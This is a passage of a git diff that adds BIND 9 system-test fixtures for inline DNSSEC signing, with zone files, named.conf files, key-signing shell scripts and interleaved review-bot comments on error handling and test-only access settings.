@@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042411 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 diff --git a/bin/tests/system/inline/ns3/master6.db.in b/bin/tests/system/inline/ns3/master6.db.in new file mode 100644 index 0000000..de3e651 --- /dev/null +++ b/bin/tests/system/inline/ns3/master6.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042412 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 + +$INCLUDE missingfile.db diff --git a/bin/tests/system/inline/ns3/master7.db.in b/bin/tests/system/inline/ns3/master7.db.in new file mode 100644 index 0000000..a3e33e7 --- /dev/null +++ b/bin/tests/system/inline/ns3/master7.db.in 
@@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns3 . ( + 2000042412 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 +ns3 A 10.53.0.3 + +c A 10.0.0.3 +e A 10.0.0.5 + +$INCLUDE include.db diff --git a/bin/tests/system/inline/ns3/named.conf.in b/bin/tests/system/inline/ns3/named.conf.in new file mode 100644 index 0000000..dc14fe9 --- /dev/null +++ b/bin/tests/system/inline/ns3/named.conf.in 
@@ -0,0 +1,179 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + try-tcp-refresh no; + notify-delay 0; + allow-new-zones yes; +}; + +zone "bits" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + allow-update-forwarding { any; }; + file "bits.bk"; + sig-signing-signatures 1; // force incremental processing +}; + +server 10.53.0.4 { request-ixfr no; }; + +zone "noixfr" { + type secondary; + primaries { 10.53.0.4; }; + inline-signing yes; + auto-dnssec maintain; + allow-update-forwarding { any; }; + file "noixfr.bk"; +}; + +zone "master" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "master.db"; + notify explicit; + also-notify { + 10.53.0.3; + }; +}; + +zone "dynamic" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + file "dynamic.db"; +}; + +zone "updated" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { none; }; + file "updated.db"; +}; + +zone "expired" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + file "expired.db"; +}; + +zone "retransfer" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + 
file "retransfer.bk"; +}; + +zone "nsec3" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + file "nsec3.db"; +}; + +zone "externalkey" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + file "externalkey.db"; +}; + +zone "retransfer3" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + file "retransfer3.bk"; +}; + +zone "inactiveksk" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + dnssec-dnskey-kskonly yes; + file "inactiveksk.bk"; +}; + +zone "inactivezsk" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + file "inactivezsk.bk"; +}; + +zone "nokeys" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + file "nokeys.bk"; +}; + +zone "delayedkeys" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "delayedkeys.db"; +}; + +zone "removedkeys-primary" { + type primary; + inline-signing yes; + auto-dnssec maintain; + allow-update { any; }; + also-notify { 10.53.0.2; }; + file "removedkeys-primary.db"; +}; + +zone "removedkeys-secondary" { + type secondary; + primaries { 10.53.0.2; }; + inline-signing yes; + auto-dnssec maintain; + file "removedkeys-secondary.bk"; +}; + +zone "unsupported" { + type primary; + file "unsupported.db"; + inline-signing yes; + auto-dnssec maintain; +}; diff --git a/bin/tests/system/inline/ns3/sign.sh b/bin/tests/system/inline/ns3/sign.sh new file mode 100755 index 0000000..7e33046 --- /dev/null +++ b/bin/tests/system/inline/ns3/sign.sh 
@@ -0,0 +1,160 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +# Fake an unsupported key +unsupportedkey=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone unsupported) +awk '$3 == "DNSKEY" { $6 = 255 } { print }' ${unsupportedkey}.key > ${unsupportedkey}.tmp +mv ${unsupportedkey}.tmp ${unsupportedkey}.key + +zone=bits +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=noixfr +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=master +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=dynamic +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=updated +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db 
+$SIGNER -S -O raw -L 2000042407 -o ${zone} ${zone}.db > /dev/null +cp master2.db.in updated.db + +# signatures are expired and should be regenerated on startup +zone=expired +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db +$SIGNER -PS -s 20100101000000 -e 20110101000000 -O raw -L 2000042407 -o ${zone} ${zone}.db > /dev/null + +zone=retransfer +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=nsec3 +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=retransfer3 +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=inactiveksk +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -P now -A now+3600 -f KSK $zone) +keyname=$($KEYGEN -q -a ${ALTERNATIVE_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${ALTERNATIVE_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> ../ns1/root.db + +zone=inactivezsk +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -P now -A now+3600 $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +keyname=$($KEYGEN -q -a ${ALTERNATIVE_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${ALTERNATIVE_ALGORITHM} -n zone -f KSK $zone) +$DSFROMKEY -T 1200 $keyname >> 
../ns1/root.db + +zone=delayedkeys +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +# Keys for the "delayedkeys" zone should not be initially accessible. +mv K${zone}.+*+*.* ../ + +zone=removedkeys-primary +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) + +zone=removedkeys-secondary +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) + +for s in a c d h k l m q z +do + zone=test-$s + keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +done + +for s in b f i o p t v +do + zone=test-$s + keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) + keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +done + +zone=externalkey +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private + +for alg in ${DEFAULT_ALGORITHM} ${ALTERNATIVE_ALGORITHM} +do + k1=$($KEYGEN -q -a $alg -n zone -f KSK $zone) + k2=$($KEYGEN -q -a $alg -n zone $zone) + k3=$($KEYGEN -q -a $alg -n zone $zone) + k4=$($KEYGEN -q -a $alg -n zone -f KSK $zone) + $DSFROMKEY -T 1200 $k4 >> ../ns1/root.db + + # Convert k1 and k2 in to External Keys. + rm -f $k1.private + mv $k1.key a-file + $IMPORTKEY -P now -D now+3600 -f a-file $zone > /dev/null 2>&1 || + ( echo_i "importkey failed: $alg" ) + rm -f $k2.private + mv $k2.key a-file + $IMPORTKEY -f a-file $zone > /dev/null 2>&1 || + ( echo_i "importkey failed: $alg" ) +done diff --git a/bin/tests/system/inline/ns4/named.conf.in b/bin/tests/system/inline/ns4/named.conf.in new file mode 100644 index 0000000..fed200a --- /dev/null +++ b/bin/tests/system/inline/ns4/named.conf.in 
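Review bot: In the `externalkey` loop at the end of ns3/sign.sh, both `$IMPORTKEY` calls end in `|| ( echo_i "importkey failed: $alg" )`, which turns a failed import into a log line and lets setup continue even though the script runs with `-e`. By then `$k1.private` or `$k2.private` has already been removed, so the zone is left with fewer external keys than the test expects, and `> /dev/null 2>&1` discards the tool's own error text. If swallowing the failure is not intentional, `|| { echo_i "importkey failed: $alg"; exit 1; }` would stop setup at that point. Both imports also reuse the fixed name `a-file` in the working directory, which is fine for a serial run but worth a comment given that the cleanup script removes `ns3/a-file` by name.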
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ notify-delay 0;
+};
+
+zone "noixfr" {
+ type primary;
+ file "noixfr.db";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/inline/ns4/noixfr.db.in b/bin/tests/system/inline/ns4/noixfr.db.in
new file mode 100644
index 0000000..c40f011
--- /dev/null
+++ b/bin/tests/system/inline/ns4/noixfr.db.in
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns4 . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns3
+ns4 A 10.53.0.4
+ns3 A 10.53.0.3
diff --git a/bin/tests/system/inline/ns5/named.conf.post b/bin/tests/system/inline/ns5/named.conf.post
new file mode 100644
index 0000000..f454b35
--- /dev/null
+++ b/bin/tests/system/inline/ns5/named.conf.post
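Review bot: ns4/named.conf.in has no `controls` statement, whereas ns1/named.conf.in in the same commit disables the control channel explicitly with `controls { /* empty */ };`. When `controls` is absent, named falls back to its default control channel on the loopback addresses if an rndc key file is available, so whether ns4 exposes one depends on the host rather than on the fixture. Adding `controls { /* empty */ };` before `options` would make ns4 behave like ns1 on any machine. The `noixfr` zone also sets `allow-update { any; }` with no note that this is test-only.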
@@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + notify-delay 0; + servfail-ttl 0; +}; + +zone "bits" { + type secondary; + primaries { 10.53.0.2; }; + file "bits.bk"; + auto-dnssec maintain; + inline-signing yes; +}; diff --git a/bin/tests/system/inline/ns5/named.conf.pre b/bin/tests/system/inline/ns5/named.conf.pre new file mode 100644 index 0000000..91844ac --- /dev/null +++ b/bin/tests/system/inline/ns5/named.conf.pre 
@@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + notify-delay 0; +}; + +zone "bits" { + type secondary; + primaries { 10.53.0.2; }; + file "bits.bk"; +}; diff --git a/bin/tests/system/inline/ns6/named.conf.in b/bin/tests/system/inline/ns6/named.conf.in new file mode 100644 index 0000000..215fd58 --- /dev/null +++ b/bin/tests/system/inline/ns6/named.conf.in 
@@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + notify-delay 0; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/inline/ns7/named.conf.in b/bin/tests/system/inline/ns7/named.conf.in new file mode 100644 index 0000000..3a0cf86 --- /dev/null +++ b/bin/tests/system/inline/ns7/named.conf.in 
@@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * NS7 + * + * NOTE: This named instance is used to reproduce a scenario which involves a + * number of functions getting called in a very specific order which results in + * an infinite loop while iterating over NSEC3 red-black tree. Ensuring this + * happens requires carefully setting the number of signing keys, NSEC3 + * parameters (number of iterations and salt value), zone data and named + * configuration. Changing any of these and/or influencing this instance's + * behavior (e.g. by sending extra queries to it) might render this test moot + * as it will no longer be able to reproduce the exact scenario it attempts to. + * + * Given the above, please do not use this instance for any other test than the + * one it was meant for. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion no; + notify no; + try-tcp-refresh no; + allow-new-zones yes; + sig-signing-nodes 100; + sig-signing-signatures 10; +}; diff --git a/bin/tests/system/inline/ns7/sign.sh b/bin/tests/system/inline/ns7/sign.sh new file mode 100755 index 0000000..462d6ad --- /dev/null +++ b/bin/tests/system/inline/ns7/sign.sh 
@@ -0,0 +1,25 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +# NOTE: The number of signing keys generated below is not coincidental. More +# details can be found in the comment inside ns7/named.conf. + +zone=nsec3-loop +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) diff --git a/bin/tests/system/inline/ns8/example.com.db.in b/bin/tests/system/inline/ns8/example.com.db.in new file mode 100644 index 0000000..dfc7630 --- /dev/null +++ b/bin/tests/system/inline/ns8/example.com.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns8 . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns8 +ns8 A 10.53.0.8 diff --git a/bin/tests/system/inline/ns8/example.db.in b/bin/tests/system/inline/ns8/example.db.in new file mode 100644 index 0000000..3ebf398 --- /dev/null +++ b/bin/tests/system/inline/ns8/example.db.in 
@@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns8 +ns8 A 10.53.0.8 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/inline/ns8/example2.db.in b/bin/tests/system/inline/ns8/example2.db.in new file mode 100644 index 0000000..1f42c3a --- /dev/null +++ b/bin/tests/system/inline/ns8/example2.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns8 +ns8 A 10.53.0.8 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/inline/ns8/example3.db.in b/bin/tests/system/inline/ns8/example3.db.in new file mode 100644 index 0000000..a9e3daa --- /dev/null +++ b/bin/tests/system/inline/ns8/example3.db.in 
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 400
+@ IN SOA mname1. . (
+ 3 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns8
+ns8 A 10.53.0.8
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
diff --git a/bin/tests/system/inline/ns8/named.conf.in b/bin/tests/system/inline/ns8/named.conf.in
new file mode 100644
index 0000000..27590da
--- /dev/null
+++ b/bin/tests/system/inline/ns8/named.conf.in
@@ -0,0 +1,162 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS8
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.8;
+ notify-source 10.53.0.8;
+ transfer-source 10.53.0.8;
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.8; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ try-tcp-refresh no;
+ notify-delay 0;
+ allow-new-zones yes;
+};
+
+zone "example01.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example01.com.db";
+};
+
+zone "example02.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example02.com.db";
+};
+
+zone "example03.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example03.com.db";
+};
+
+zone "example04.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example04.com.db";
+};
+
+zone "example05.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example05.com.db";
+};
+
+zone "example06.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example06.com.db";
+};
+
+zone "example07.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example07.com.db";
+};
+
+zone "example08.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example08.com.db";
+};
+
+zone "example09.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example09.com.db";
+};
+
+zone "example10.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example10.com.db";
+};
+
+zone "example11.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example11.com.db";
+};
+
+zone "example12.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example12.com.db";
+};
+
+zone "example13.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example13.com.db";
+};
+
+zone "example14.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example14.com.db";
+};
+
+zone "example15.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example15.com.db";
+};
+
+zone "example16.com" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example16.com.db";
+};
+
+zone example {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "example.db";
+};
+
+zone "unsigned-serial-test" {
+ type primary;
+ inline-signing yes;
+ auto-dnssec maintain;
+ file "unsigned-serial-test.db";
+};
diff --git a/bin/tests/system/inline/ns8/sign.sh b/bin/tests/system/inline/ns8/sign.sh
new file mode 100755
index 0000000..cedad7c
--- /dev/null
+++ b/bin/tests/system/inline/ns8/sign.sh
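Review bot: The `controls` statement in ns8/named.conf.in opens the rndc channel with `allow { any; }`, so the only thing gating control commands is `rndc_key`, which is included from `../../common/rndc.key` and therefore appears to be key material shared across the test tree; the `options` block additionally sets `allow-new-zones yes`. That is workable for a fixture that listens only on 10.53.0.8, but the stanza is easy to copy elsewhere, so I would add a comment above `controls` such as `// test fixture only: rndc key is shared test material; do not reuse this ACL outside the system tests`. If the harness only ever connects from the 10.53.0.x test addresses (not visible in this hunk), narrowing the ACL to that range would be the stronger option.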
@@ -0,0 +1,36 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
